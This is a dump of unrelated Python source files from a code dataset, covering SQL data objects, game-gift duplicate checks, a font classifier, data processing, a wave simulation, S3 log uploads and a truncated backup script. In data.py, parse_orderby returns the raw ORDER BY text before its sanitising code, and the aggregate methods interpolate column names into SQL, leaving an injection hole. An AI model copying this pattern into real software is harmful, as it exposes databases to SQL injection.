There are %d arguments.\"\n % len(sqlargs))\n print(sql)\n print(sqlargs)\n raise SQLArgumentMismatchError\n\n # ready to go\n # optionally show our query.\n if _debug:\n print(\"LIST:\", sql)\n print(\"LIST:\", sqlargs)\n pass\n # execute query\n data = execute(sql, sqlargs)\n\n # if _debug:\n # print \"DATA COUNT:\", len(data)\n\n # convert to objects if required\n if asObjects:\n data = [cls.get(i['uid'], data=i) for i in data]\n\n return data\n\n @classmethod\n def parse_orderby(self, orderby):\n \"sanitise sql order by clause - can't use normal mySQLdb parameter substitution as it quotes field names\"\n # print \"parse_orderby not implemented\"\n return orderby\n\n parts = [i.strip().split(' ', 1) for i in orderby.split(',')]\n clauses = []\n\n for part in parts:\n field = part[0].strip().replace('`', '')\n if not field:\n continue\n direction = (len(part) > 1 and part[1] or '').strip().upper()\n\n # field should be in self._v_fields\n if field not in self._v_fields:\n print(\"invalid field\", field)\n raise InvalidOrderFieldError\n\n # direction should be empty or one of ASC|DESC\n if direction not in ('', 'ASC', 'DESC'):\n raise InvalidOrderDirectionError\n\n clauses.append('`%s`%s%s' % (field, direction and ' ' or '',\n direction))\n return ', '.join(clauses)\n\n @classmethod\n def count(cls,\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return count of data filtered by these criteria\n \"\"\"\n return cls.list(\n asObjects=False,\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=\"count(uid)\",\n **criteria)[0][\"count(uid)\"]\n\n @classmethod\n def list_int(cls,\n item='uid',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return list of integers from item (column) filtered by these criteria\n \"\"\"\n return [\n int(i[item])\n for i in cls.list(\n asObjects=False,\n sql=\"\",\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=\"`%s`\" % item,\n **criteria)\n ]\n\n @classmethod\n def max(cls,\n item='uid',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return max of item (column) filtered by these criteria\n \"\"\"\n what = 'max(%s)' % item\n return cls.list(\n asObjects=False,\n sql=\"\",\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=what,\n **criteria)[0][what]\n\n @classmethod\n def min(cls,\n item='uid',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return min of item (column) filtered by these criteria\n \"\"\"\n what = 'min(%s)' % item\n return cls.list(\n asObjects=False,\n sql=\"\",\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=what,\n **criteria)[0][what]\n\n @classmethod\n def sum(cls,\n item='uid',\n like={},\n isin={},\n orderby='',\n where='',\n limit='',\n **criteria):\n \"\"\"return min of item (column) filtered by these criteria\n \"\"\"\n what = 'sum(%s)' % item\n return cls.list(\n asObjects=False,\n sql=\"\",\n like=like,\n isin=isin,\n orderby=orderby,\n where=where,\n limit=limit,\n what=what,\n **criteria)[0][what]\n\n\n# export / import\n\n def for_export(self, extras=[]):\n \"convert object to a dictionary (for pickling) - include only standard fields, plus given extras\"\n return dict((k, v) for k, v in list(self.__dict__.items())\n if k in self._v_fields or k in extras)\n\n # Dummy methods for leak testing\n @classmethod\n def mundane(self, *a, **k):\n return 'OK'\n\n\n#renote 
removed for now - see data_remote.py\n\n\ndef makeDataClass(Schema):\n \"Set up a custom SQL data class\"\n #dbc = Connection('makeDataClass')\n #db = Cursor(dbc)\n db = None\n # we only need to get the field info once per class\n data = { #'db':db\n 'table':Schema.tablesql\n , '_v_schema': Schema._v_schema\n , '_v_fields': list(Schema._v_schema.keys())\n , '_v_textkeys': Schema._v_textkeys\n , '_v_multikeys': Schema._v_multikeys\n }\n # return type(Schema.table.capitalize(), (RemoteSQLDataObject,), data)\n return type(Schema.table.capitalize(), (MassProducedSQLDataObject, ),\n data) #remote disabled for now\n\n\n# TESTS\nif __name__ == '__main__':\n # Data Object\n c = DataObject(['camelid', 'ox'])\n # let's start with a clear run\n assert c.flush() == {}, \"Flush should be empty\"\n # Check for a valid change\n c.camelid = 'llama'\n assert c.flush() == {'camelid': 'llama'}, \"setattr noworks\"\n assert c.flush() == {}, \"Flush should be empty\"\n # _v_ attributes don't register change\n c._v_gonewiththewind = 'Frankly'\n assert c.flush() == {}, \"Flush should be empty\"\n c.gnu = 'GNU'\n assert c.flush() == {}, \"Flush should be empty\"\n c.update({'ox': 'OXEN'})\n assert c.flush() == {'ox': 'OXEN'}, \"update noworks\"\n c.update({'ox': 'OXEN'})\n del c.ox\n assert c.flush() == {}, \"Flush should be empty\"\n\n # filter flush by only\n c.camelid = 'Alpaca'\n res = c.flush(only=['bison'])\n assert res == {}, \"Flush should be empty\"\n","sub_path":"evoke/data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":22951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
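The list() docstring above already maps keyword criteria to WHERE clauses (self.list(x=5, y='something') becomes WHERE x=5 and y="something"); combining that with the documented orderby/pager parameters, a call takes the shape below, where Camelid stands for any hypothetical class produced by makeDataClass:

# page 0 of 20 rows, newest uid first; kwargs become WHERE clauses
rows = Camelid.list(name='llama', orderby='uid desc', pager=0, pagelength=20)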
+{"seq_id":"241910016","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFunctions that check whether anything has been duplicated by each feature\n\"\"\"\nfrom gift.models import Gift\nfrom common.actionlog import ActionLogWriter\nfrom django.core.mail import mail_managers\nfrom django.conf import settings\nimport datetime\n\ndef send_duplicate_mail(title, message):\n    mail_managers(title, message)\n    \n\ndef check_duplicate_gift(request, category, latest_gift_list, from_player, target_player, gift, player_gift_id_or_instance, player_card, card_level=1, card_experience=0, card_ability_level=1):\n    \"\"\"\n    Check whether a player card was duplicated through the gift feature\n    \"\"\"\n    for latest_gift in latest_gift_list:\n        # When the conditions below hold, a duplicate is suspected\n        # creation time of the most recent gift\n        latest_gift_created_at = latest_gift.created_at\n        # creation time of the current gift\n        gift_created_at = gift.created_at\n        # one minute before the current gift's creation time\n        before_gift_created_at = gift_created_at - datetime.timedelta(minutes=1)\n        \n        if latest_gift_created_at == gift.created_at or (before_gift_created_at <= latest_gift_created_at and latest_gift_created_at <= gift_created_at):\n            if latest_gift.card_id == gift.card_id and card_level == latest_gift.card_level and card_experience == latest_gift.card_experience and card_ability_level == latest_gift.card_ability_level:\n                ActionLogWriter.duplicate_gift(request, from_player, target_player, category, player_gift_id_or_instance, card_level=gift.card_level, \n                                               card_experience=gift.card_experience, card_ability_level=gift.card_ability_level, player_card=player_card)\n                # also send a notification mail\n                duplicate_mail_title = u'A player card may have been duplicated'\n                duplicate_mail_message = u'[from player id] %s [target player id] %s [card id] %s' % (from_player.pk, target_player.pk, gift.card_id)\n                send_duplicate_mail(duplicate_mail_title, duplicate_mail_message)\n                break","sub_path":"server/module/common/check_duplicate.py","file_name":"check_duplicate.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"452589884","text":"import torch\r\nimport torch.nn as nn\r\n\r\nimport torchvision\r\n\r\nimport numpy as np\r\n\r\nfrom torch.autograd import Variable\r\nfrom utils import getBatch\r\n\r\nclass fontEncoder(nn.Module):\r\n\r\n def __init__(self):\r\n super(fontEncoder, self).__init__()\r\n self.conv1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=21, stride=2, padding=0),\r\n nn.InstanceNorm2d(num_features=16, track_running_stats=True),\r\n nn.ReLU()\r\n )\r\n self.conv2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=7, stride=2, padding=0),\r\n nn.InstanceNorm2d(num_features=32, track_running_stats=True),\r\n nn.ReLU()\r\n )\r\n self.conv3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, stride=1, padding=0),\r\n nn.InstanceNorm2d(num_features=64, track_running_stats=True),\r\n nn.ReLU()\r\n )\r\n # B*1*64*64 -> B*16*22*22 -> B*32*8*8 -> B*64*4*4\r\n self.fc = nn.Linear(1024, 256)\r\n \r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = self.conv2(x)\r\n x = self.conv3(x)\r\n x = x.view(x.size(0), x.size(1)*x.size(2)*x.size(3))\r\n\r\n output = self.fc(x)\r\n return output\r\n\r\nclass classifier(nn.Module):\r\n\r\n def __init__(self):\r\n super(classifier, self).__init__()\r\n self.fc1 = nn.Sequential(\r\n nn.Linear(256, 256),\r\n nn.ReLU()\r\n )\r\n self.fc2 = nn.Sequential(\r\n nn.Linear(256, 128),\r\n nn.ReLU()\r\n )\r\n self.fc3 = nn.Sequential(\r\n nn.Linear(128, 50), ############\r\n nn.Sigmoid()\r\n )\r\n \r\n def forward(self, x):\r\n x = self.fc1(x)\r\n x = self.fc2(x)\r\n x = self.fc3(x)\r\n\r\n return x\r\n\r\n\r\n\r\nbase = \"data/\"\r\nreadList = open(\"remaining.txt\").read().split()[:50] ##########\r\nbatch_size = 64\r\nNUM_EPOCH = 80 # 1200\r\nlearning_rate = 0.0003\r\n\r\nenc = fontEncoder().cuda()\r\ncla = classifier().cuda()\r\n\r\nloss_function = nn.CrossEntropyLoss().cuda()\r\noptimizer = torch.optim.Adam(list(enc.parameters()) + list(cla.parameters()), lr=learning_rate)\r\n\r\ntrain_set = getBatch(base, readList, BATCH_SIZE=batch_size)\r\n\r\nfor epoch in range(NUM_EPOCH):\r\n \r\n print(\"current epoch: \", epoch)\r\n\r\n for index, (image, label) in enumerate(train_set):\r\n optimizer.zero_grad()\r\n\r\n image = image.cuda()\r\n label = label.cuda()\r\n\r\n embedding = enc(image)\r\n output = cla(embedding)\r\n\r\n loss = loss_function(output, label)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if index%10 == 0:\r\n print(\"case \", index, \", current loss = %0.5f\" % loss.item())\r\n torch.save(enc, \"enc1.pkl\")\r\n torch.save(cla, \"cla1.pkl\")\r\n'''\r\nbase = \"gen_image/\"\r\n\r\nSTART = 108\r\n\r\nEND = 129 # 3982\r\nNUM_EPOCH = 1200\r\nlearning_rate = 0.0003\r\n\r\nenc = fontEncoder().cuda()\r\ncla = classifier().cuda()\r\n\r\nloss_function = nn.CrossEntropyLoss().cuda()\r\noptimizer = torch.optim.Adam(list(enc.parameters()) + list(cla.parameters()), lr=learning_rate)\r\n\r\n# loss_history = [0]*3874\r\n# max_loss = [0]*3874\r\nprint(\"reading data.\")\r\ndata = []\r\nlabels = []\r\nfor i in range(START, END):\r\n\r\n pics = getData(base, i)\r\n label = np.zeros(pics.shape[0], dtype=np.int32)\r\n label[:] = i - START\r\n\r\n data.append(pics)\r\n labels.append(label)\r\n\r\nfor epoch in range(NUM_EPOCH):\r\n \r\n print(\"current epoch: \", epoch)\r\n\r\n for i in range(START, START + 20):\r\n\r\n optimizer.zero_grad()\r\n\r\n pic = data[i - START]\r\n label = labels[i - START]\r\n\r\n pic = Variable(torch.Tensor(pic)).cuda()\r\n label = 
Variable(torch.Tensor(label)).cuda().long()\r\n\r\n embedding = enc(pic)\r\n output = cla(embedding)\r\n\r\n loss = loss_function(output, label)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if i%5 == 0:\r\n print(\"case \", i, \", current loss = %0.5f\" % loss.item())\r\n torch.save(enc, \"enc1.pkl\")\r\n torch.save(cla, \"cla1.pkl\")\r\n'''","sub_path":"font_extractor.py","file_name":"font_extractor.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"284535653","text":"import os\nimport csv\nimport urllib\nimport shutil\nimport dataconverters\n\nurl_national = 'http://us.spindices.com/documents/additionalinfo/20131126/64929_csnational-values-1126.xls'\nurl_cities = 'http://us.spindices.com/documents/additionalinfo/20131126/64929_cshomeprice-history-1126.xls'\nxls_national = 'tmp/national.xls'\nxls_cities = 'tmp/cities.xls'\ntmp_national = 'tmp/national.csv'\ntmp_cities = 'tmp/cities.csv'\nout_national_year = 'data/national-year.csv'\nout_national_quarter = 'data/national-quarter.csv'\nout_cities = 'data/cities-month.csv'\n\ndef setup():\n if not os.path.exists('tmp'):\n os.makedirs('tmp')\n if not os.path.exists('data'):\n os.makedirs('data')\n\ndef retrieve():\n urllib.urlretrieve(url_national, xls_national)\n urllib.urlretrieve(url_cities, xls_cities)\n\ndef xls_to_csv():\n dataconverters.dataconvert(xls_national, tmp_national)\n dataconverters.dataconvert(xls_cities, tmp_cities, guess_types=False)\n\ndef process_national():\n fo = open(tmp_national)\n reader = csv.DictReader(fo)\n foout = open(out_national_year, 'w')\n writer = csv.writer(foout)\n writer.writerow(['Year', 'Composite-US'])\n vals = []\n for row in reader:\n year = row['YEAR'][:4]\n quarter = row['QTR'][1]\n vals.append(float(row['COMPOSITE-US']))\n if quarter == '4':\n val = round(sum(vals) / 4, 2)\n vals = []\n writer.writerow([year, val])\n\ndef process_national_q():\n fo = open(tmp_national)\n reader = csv.DictReader(fo)\n foout = open(out_national_quarter, 'w')\n writer = csv.writer(foout)\n writer.writerow(['Date', 'Composite-US'])\n for row in reader:\n year = row['YEAR'][:4]\n date = '%s-%02d-01' % (year, (int(row['QTR'][1])-1)*3+1)\n writer.writerow([date, row['COMPOSITE-US']])\n\ndef process_cities():\n indata = open(tmp_cities).read()\n # fix time in dataconvert which adds 00:00:00\n indata = indata.replace(' 00:00:00', '')\n indata = indata.replace('column_1', 'Date')\n indata = indata.split('\\n')\n del indata[1]\n indata = '\\n'.join(indata)\n open(out_cities, 'w').write(indata)\n\ndef process():\n setup()\n retrieve()\n xls_to_csv()\n process_national()\n process_national_q()\n process_cities()\n\nif __name__ == '__main__':\n process()\n\n","sub_path":"scripts/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"297413241","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nLine operations.\nAll operations have return value for post processing.\n\n@author: CHEN Yongxin\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef horizontalSegmentLines(x, y):\n \"\"\" Returns horizontal segment lines' data\n _________ \n |\n e.g. _____ | ...\n | |\n |_____| \n args:\n x: x coordinate values with (m+1) values\n y: y coordinate values with (m ) values\n returns:\n X, Y: segment lines' coordinate with 2*m values\"\"\"\n m = len(y)\n X = np.zeros(2*m)\n Y = np.zeros(2*m)\n X[1::2] = x[1:]\n X[2::2] = X[1:-1:2]\n X[0] = x[0]\n Y[1::2] = y\n Y[ ::2] = Y[1::2]\n return X, Y\n \ndef horizontalStartLines(x, y):\n \"\"\" Returns horizontal start lines' data\n args:\n x: x coordinate values with m values\n y: y coordinate values with m values\n returns:\n X, Y: segment lines' coordinate with 2*m-1 values\"\"\"\n m = len(x)\n X = np.zeros(2*m-1)\n Y = np.zeros(2*m-1)\n X[ ::2] = x\n X[1::2] = X[2::2]\n Y[1::2] = y[ :-1]\n Y[ ::2] = y\n return X, Y\n \ndef verticalStartLines(x, y):\n \"\"\" Returns vertical start lines' data\n args:\n x: x coordinate values with m values\n y: y coordinate values with m values\n returns:\n X, Y: segment lines' coordinate with 2*m-1 values\"\"\"\n m = len(x)\n X = np.zeros(2*m-1)\n Y = np.zeros(2*m-1)\n X[ ::2] = x\n X[1::2] = X[ :-1:2]\n Y[ ::2] = y\n Y[1::2] = y[1:]\n return X, Y\n \ndef verticalLines(mini, maxi, style, x, plot=False):\n \"\"\" Plots vertical lines \n args:\n mini : minimum value\n maxi : maximum value\n style: plot style\n *x : x coordinate of vertical lines \"\"\"\n if plot:\n for i in x:\n plt.plot([i, i], [mini, maxi], style)\n n = len(x)\n '''return value: vl\n vl = [x1, x2, y1, y2 ...]'''\n vl = np.zeros((n, 4))\n for i in range(n):\n vl[i, :2] = x[i]\n vl[i, 2 ] = mini\n vl[i, 3 ] = maxi\n return vl\n \ndef horizontalLines(mini, maxi, style, y, plot=False):\n \"\"\" Plots horizontal lines \n args:\n mini : minimum value\n maxi : maximum value\n style: plot style\n *y : y coordinate of horizontal lines \"\"\"\n if plot:\n for i in y:\n plt.plot([mini, maxi], [i, i], style)\n n = len(y)\n '''return value: hl\n hl = [x1, x2, y1, y2 ...]'''\n hl = np.zeros((n, 4))\n for i in range(n):\n hl[i, 0 ] = mini \n hl[i, 1 ] = maxi\n hl[i, 3:] = y[i]\n return hl\n\ndef grid(xmin, xmax, ymin, ymax, x, y, plot=False, stylex='k', styley='k'):\n \"\"\"Returns and plots horizontal and vertical lines, i.e. grid\n args:\n x, y: x and y lines coordinates\"\"\"\n hl = horizontalLines(ymin, ymax, styley, y, plot=plot)\n vl = verticalLines(xmin, xmax, stylex, x, plot=plot)\n return np.concatenate((hl, vl), axis=0)","sub_path":"Numetica/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
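A small usage sketch for the grid helper above: every row of the returned array encodes one line as [x1, x2, y1, y2].

# a 2x2-cell grid on the unit square: 3 horizontal plus 3 vertical lines
g = grid(0.0, 1.0, 0.0, 1.0, x=[0.0, 0.5, 1.0], y=[0.0, 0.5, 1.0])
print(g.shape)  # (6, 4)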
+{"seq_id":"38497254","text":"import numpy as np\n\nfrom gbvision.constants.system import EMPTY_PIPELINE\nfrom gbvision.models.contours import find_contours, FilterContours, sort_contours, contours_to_rotated_rects_sorted\nfrom gbvision.models.shapes import filter_inner_rotated_rects\nfrom .object_finder import ObjectFinder\n\n\nclass RotatedRectFinder(ObjectFinder):\n \"\"\"\n finds a rectangular object, but rotated. recommended to use when you know the shape isn't parallel to the camera\n \"\"\"\n\n def __init__(self, threshold_func, game_object, area_scalar=1.0, contour_min_area=3.0):\n \"\"\"\n\n :param area_scalar: optional, a scalar to multiply the area by, for fine tuning of the function's output\n :param contour_min_area: the minimal area of a contour, used for FilterContours, default is 0 (no area limit)\n \"\"\"\n ObjectFinder.__init__(self, threshold_func, game_object)\n self._full_pipeline = (EMPTY_PIPELINE +\n threshold_func +\n find_contours +\n FilterContours(min_area=contour_min_area) +\n sort_contours +\n contours_to_rotated_rects_sorted +\n filter_inner_rotated_rects)\n self.area_scalar = area_scalar\n\n def __call__(self, frame, camera):\n rects = self._full_pipeline(frame)\n return list(map(\n lambda rect: self.game_object.location_by_params(camera,\n self.area_scalar * np.sqrt(rect[1][0] * rect[1][1]),\n rect[0]), rects))","sub_path":"gbvision/finders/rotated_rect_finder.py","file_name":"rotated_rect_finder.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"50990021","text":"from __future__ import division\nfrom builtins import object\nfrom past.utils import old_div\nfrom proteus import *\nfrom proteus.default_p import *\nfrom proteus.mprans import SW2DCV\nfrom proteus.mprans import GN_SW2DCV\nfrom proteus.Domain import RectangularDomain\nimport numpy as np\nfrom proteus import (Domain, Context, MeshTools as mt)\nfrom proteus.Profiling import logEvent\nimport proteus.SWFlows.SWFlowProblem as SWFlowProblem\n\n\n\"\"\"\nThis test uses the definition of a solitary wave from eqn 31\nin the the paper 'A rapid numerical method for solving Serre Green Naghdi\nequations describing long free surface gravity waves' by\nFavrie and Gavrilyuk.\n\"\"\"\n\n# *************************** #\n# ***** GENERAL OPTIONS ***** #\n# *************************** #\n\nopts = Context.Options([\n ('sw_model', 1, \"sw_model = {0,1} for {SWEs,DSWEs}\"),\n (\"final_time\", 4.0, \"Final time for simulation\"),\n (\"dt_output\", 0.1, \"Time interval to output solution\"),\n (\"cfl\", 0.25, \"Desired CFL restriction\"),\n (\"refinement\", 4, \"Refinement level\")\n])\n\n###################\n# DOMAIN AND MESH #\n###################\nL = (10.0, 1.0)\nX_coords = (0.0, 10.0) # this is domain, used in BCs\ndomain = RectangularDomain(L=L, x=[0, 0, 0])\n\n# CREATE REFINEMENT #\nrefinement = opts.refinement\nnnx0 = 6\nnnx = (nnx0 - 1) * (2**refinement) + 1\nnny = old_div((nnx - 1), 10) + 1\nhe = old_div(L[0], float(nnx - 1))\ntriangleOptions = \"pAq30Dena%f\" % (0.5 * he**2,)\n\n###################################\n# SOLITARY WAVE FUCTIONS AND BATH #\n###################################\ng = 9.81\nh1 = .10\nh2 = .11\nx0 = 2.0 # initial location of solitary wave\n# solitary wave celerity and width\nc = np.sqrt(g * h2)\nr = np.sqrt(old_div(3.0 * (h2 - h1), 4 * h2 * h1**2))\n\ndef solitary_wave(x, t):\n phase = x - c * t - x0\n return h1 + (h2 - h1) * old_div(1.0, np.cosh(r * phase)**2)\n\n\ndef u(x, t):\n h = solitary_wave(x,t)\n return c * (1.0 - old_div(h1, h))\n\n\ndef bathymetry_function(X):\n x = X[0]\n # then return vector of zeros\n return x * 0.0\n\n\n###################################\n# FOR ANALYTICAL SOLUTIONS #\n###################################\nclass Zero(object):\n def uOfXT(self, x, t):\n return 0.0\n\n\nclass water_height_at_tfinal(object):\n def uOfXT(self, X, t):\n return solitary_wave(X[0], opts.final_time)\n\n\n##############################\n# INITIAL CONDITIONS #\n##############################\n\n\nclass water_height_at_t0(object):\n def uOfXT(self, X, t):\n return solitary_wave(X[0], 0.0)\n\n\nclass x_mom_at_t0(object):\n def uOfXT(self, X, t):\n h = solitary_wave(X[0], 0.0)\n return h * u(X[0], 0.0)\n\n\nclass y_mom_at_t0(object):\n def uOfXT(self, X, t):\n h = water_height_at_t0().uOfXT(X, t)\n return 0. 
* h\n\n\n\"\"\"\nheta and hw are needed for the modified green naghdi equations.\nNote that the BCs for the heta and hw should be same as h.\nFor more details see: 'Robust explicit relaxation techinque for solving\nthe Green-Naghdi equations' by Guermond, Popov, Tovar, Kees.\nJCP 2019\n\"\"\"\n\n\nclass heta_at_t0(object):\n def uOfXT(self, X, t):\n h = water_height_at_t0().uOfXT(X, 0.0)\n return h**2\n\n\nclass hw_at_t0(object):\n def uOfXT(self, X, t):\n # since there is no bathymetry, waterHeight = htilde\n # hw = -waterHeight^2 * div(vel)\n # = -h^2 * (c * h1 * hTildePrime/hTilde^2) = -c * h1 * hTildePrime\n x = X[0]\n phase = x - c * t - x0\n sechSqd = old_div(1.0, np.cosh(r * phase)**2)\n hprime = -2.0 * (h2 - h1) * r * sechSqd * np.tanh(r * phase)\n hw = -c * h1 * hprime\n return hw\n\n\n###############################\n# BOUNDARY CONDITIONS #\n###############################\n\n\ndef x_mom_DBC(X, flag):\n if X[0] == X_coords[0] or X[0] == X_coords[1]:\n return lambda x, t: 0.0\n\n\n# ********************************** #\n# ***** Create mySWFlowProblem ***** #\n# ********************************** #\n\n\noutputStepping = SWFlowProblem.OutputStepping(\n opts.final_time, dt_output=opts.dt_output)\ninitialConditions = {'water_height': water_height_at_t0(),\n 'x_mom': x_mom_at_t0(),\n 'y_mom': y_mom_at_t0(),\n 'h_times_eta': heta_at_t0(),\n 'h_times_w': hw_at_t0()}\nboundaryConditions = {'water_height': lambda x, flag: None,\n 'x_mom': x_mom_DBC,\n 'y_mom': lambda x, flag: lambda x, t: 0.0,\n 'h_times_eta': lambda x, flag: None,\n 'h_times_w': lambda x, flag: None}\nanalytical_Solution = {'h_exact': water_height_at_tfinal(),\n 'hu_exact': Zero(),\n 'hv_exact': Zero(),\n 'heta_exact': Zero(),\n 'hw_exact': Zero()}\n\nmySWFlowProblem = SWFlowProblem.SWFlowProblem(sw_model=opts.sw_model,\n cfl=0.25,\n outputStepping=outputStepping,\n structured=True,\n he=he,\n nnx=nnx,\n nny=nny,\n domain=domain,\n initialConditions=initialConditions,\n boundaryConditions=boundaryConditions,\n bathymetry=bathymetry_function,\n analyticalSolution=analytical_Solution)\nmySWFlowProblem.physical_parameters['LINEAR_FRICTION'] = 0\nmySWFlowProblem.physical_parameters['mannings'] = 0.0\n","sub_path":"proteus/SWFlows/tests/solitary_wave/SWFlow.py","file_name":"SWFlow.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
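A quick sanity check of the solitary-wave profile defined above, using the module's own h1, h2, x0 and solitary_wave: at the crest (x = x0, t = 0) the sech-squared factor is 1, so the height is exactly h2, and far from the crest it decays back to the still-water depth h1.

assert abs(solitary_wave(x0, 0.0) - h2) < 1e-12         # crest height equals h2
assert abs(solitary_wave(x0 + 100.0, 0.0) - h1) < 1e-6  # tail decays to h1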
+{"seq_id":"14029204","text":"import os\nfrom urllib import request, parse\nimport json\nfrom pprint import pprint\nimport datetime, time, calendar\nfrom dateutil.relativedelta import relativedelta\nimport pandas\nimport boto3\n\n### API request settings ###\nurl = os.environ['CLOUD_SECURE_URL']\ntoken = os.environ['CLOUD_SECURE_TOKEN']\nsvm = os.environ['GET_DEVICE_NAME']\n\n### Temporary location for the output data ###\noutput_path = '/tmp/'\nupload_bucket = 'myuichi-python-upload-test-bucket'\n\n### Build the search time range ###\ndef get_search_time(date):\n\tlast = date - relativedelta(months=1)\n\tbegin_date = datetime.datetime(last.year, last.month, 1)\n\tbegin_date = int(time.mktime(begin_date.timetuple()) * 1000)\n\tend_date = datetime.datetime(date.year, date.month, 1)\n\tend_date = int(time.mktime(end_date.timetuple()) * 1000)\n\t### Getting the last day of the previous month ###\n\t# last_end_date = datetime.datetime(last.year, last.month, calendar.monthrange(last.year, last.month)[1])\n\t# last_end_date = int(time.mktime(last_end_date.timetuple()) * 1000)\n\treturn begin_date, end_date\n\n### Fetch the forensic (access) log ###\ndef get_forensic_log(svm, token, url, output_path):\n\t### Get the S3 bucket object ###\n\ts3 = boto3.resource('s3')\n\tbucket = s3.Bucket(upload_bucket)\n\n\t### Define the GET request query string & headers ###\n\ttoday = datetime.datetime.utcnow()\n\tbegin_date, end_date = get_search_time(today)\n\tparam = {\n\t\t'deviceName': svm,\n\t\t'fromTime': begin_date,\n\t\t'toTime': end_date\n\t}\n\theaders = {\n\t\t'x-cloudinsights-apikey': token\n\t}\n\n\t### URL-encode the query string ###\n\tquery_strings = parse.urlencode(param)\n\tget_url = url + query_strings\n\n\t### Build and execute the GET request ###\n\treq = request.Request(get_url, headers=headers)\n\twith request.urlopen(req) as res:\n\t\tbody = json.loads(res.read())\n\t\toutput_body = pandas.json_normalize(body['results'])\n\t\toutput_file = str(today.year) + str(today.month) + '_' + svm + '_' + 'output.csv'\n\t\tattachment = output_path + output_file\n\t\toutput_body.to_csv(attachment, encoding='utf-8')\n\t\tbucket.upload_file(attachment, output_file)\n\t\n\treturn attachment\n\n### Main ###\ndef main():\n\tattachment = get_forensic_log(svm, token, url, output_path)\n\tprint('Upload: ' + attachment)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"src/cloud-insights/get-forensic-and-upload.py","file_name":"get-forensic-and-upload.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"405767242","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n#\n# File: Backuppa.py\n# Auth: © 2017 Mattia Oss \n# Date: Sun, 01 Oct 2017 23:16:14 \n# Description: minimal backup system.\n\n##################################################################\n\nBATCH = DEBUG = VERBOSE = False\n\n##################################################################\n\nimport sys, os, os.path as op, subprocess, datetime as dt, argparse, yaml, shlex, grp\n\ndef pstr(s):\n print('--------------[ %s ]--------------' % s)\n\nclass Backuppa:\n\n def __init__(self, baktype, key, name='localhost', backdir='.', rsyncfile='', tardir='', outfile='', group='', uploaddir='', mysql=False, mysqldbs=[], dpkg=False):\n # self.type = type of backup (daily, weekly)\n self.type = ''\n # a man needs a name\n self.name = name\n # self.backdir = main backup dir\n self.backdir = ''\n # self.rsyncfile = rsync file to use\n self.rsyncfile = ''\n # self.tardir = where to put backup files\n self.tardir = ''\n # self.outfile = output file (overwrites self.tardir)\n self.outfile = ''\n # group for standard users (do nothing if empty)\n self.group = group\n # self.uploaddir = upload directory\n self.uploaddir = ''\n # save list of installed packages\n self.dpkg = dpkg\n # dump mysql?\n self.mysql = mysql\n # mysql databases\n self.mysqldbs = mysqldbs\n # use this key to encript\n self.key = key\n\n self.setType(baktype)\n self.setBackDir(backdir)\n self.setRsyncFile(rsyncfile)\n self.setTarDir(tardir)\n self.setOutFile(outfile)\n self.setUploadDir(uploaddir)\n\n if DEBUG:\n print(self.__dict__)\n\n def __str__(self):\n s = \"\"\"\\\nbackup type\\t: {0[type]}\\n\\\nname\\t\\t: {0[name]}\\n\\\nbackup dir\\t: {0[backdir]}\\n\\\nrsync file\\t: {0[rsyncfile]}\\n\\\ntarball dir\\t: {0[tardir]}\\n\\\noutput file\\t: {0[outfile]}\\n\\\ngroup\\t\\t: {0[group]}\\n\\\nupload dir\\t: {0[uploaddir]}\\n\\\nSave dpkg list\\t: {0[dpkg]}\\n\\\ndump mysql\\t: {0[mysql]}\\n\\\nmysqldbs\\t: {0[mysqldbs]}\\n\\\nGPG key\\t\\t: {0[key]}\\\n\"\"\".format(self.__dict__)\n return s\n\n def setType(self, t):\n \"\"\" Set type of backup \"\"\"\n types = ['daily', 'weekly', 'monthly']\n if t in types:\n self.type = t\n if DEBUG:\n print('self.type =', self.type)\n else:\n print('Error: backup type {} not supported. Valid choices: {}'.format(t, types))\n sys.exit(1)\n\n def setName(self, name):\n \"\"\" Name the backup \"\"\"\n self.name = name\n\n def setBackDir(self, d):\n \"\"\" Set backup directory \"\"\"\n p = op.abspath(d)\n if op.isdir(p):\n self.backdir = p\n else:\n print('Not a valid directory: ', d)\n sys.exit(1)\n\n def setRsyncFile(self, f):\n \"\"\" Set rsync file 